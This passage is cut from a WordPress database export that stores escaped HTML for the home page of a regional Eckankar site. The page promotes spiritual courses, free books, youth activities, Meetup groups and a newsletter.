font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241359,41023,'post_title','Home'),(241360,41023,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 